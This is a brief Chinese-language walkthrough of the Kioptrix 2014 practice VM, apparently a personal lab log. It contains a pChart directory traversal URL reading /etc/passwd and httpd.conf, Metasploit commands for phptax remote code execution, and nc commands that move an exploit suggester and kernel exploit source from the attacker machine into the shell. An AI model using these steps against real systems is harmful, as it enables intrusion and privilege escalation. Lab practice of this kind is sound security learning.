Kioptrix 2014

Kioptrix 2014

2:07 开始
http://192.168.67.129/

1
2
3
22/tcp   closed   ssh
80/tcp   filtered http
8080/tcp open     http-proxy

web

2:28 web目录扫描,爬行

查看源码,发现一个地址pChart2.1.3/index.php

1
2
3
searchsploit pchart
searchsploit -m exploits/php/webapps/31173.txt
leafpad 311tab补全命令

exp提示有目录遍历漏洞和反射型xss

http://192.168.67.129/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

查看apache配置文件

1
http://192.168.67.129/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf


经过检查得知,修改user-agent头,可以访问8080端口。

http://192.168.67.129:8080/phptax/

找到phptax 远程代码执行,拥有exp

1
2
3
4
5
6
msfconsole
search phptax
use 0
set RHOSTS 192.168.67.129
set RPORT 8080
run

获得一个www权限的shell

privelege

ctrl + z 退出session,记住session编号。

1
2
3
4
5
6
7
8
9
search local_exploit
use 0 
show options
set sessions 1
run
[*] 192.168.67.129 - Collecting local exploits for cmd/unix...
[*] 192.168.67.129 - 7 exploit checks are being tried...
[*] Post module execution completed
失败

没有python、php、wget、curl,但是有nc,gcc

上传检查脚本

kali: nc -lnvp 80 < linux-exploit-suggester.sh
shell: nc kali’sIP 80 > linux.sh
运行后还是失败,猜测只有bash才能运行linux-exploit-suggester.sh,而得到的shell类型为sh

searchsploit freebsd 9
上传对应的内核漏洞exp

4:50结束,其中神游发呆做菜聊天占了绝大部分时间ORZ

conclusion

1
2
3
4
5
-n			numeric-only IP addresses, no DNS
-v  			verbose
-w secs			timeout for connects and final net reads
 
nc -nv 192.168.1.67 443 -w 5 > exploit.c

如果不加-w参数,nc会一直连接,哪怕是传输文件成功了,也不会断开。
所以必须加该参数,否则不稳定的shell运行ctrl+c,shell就会没有了。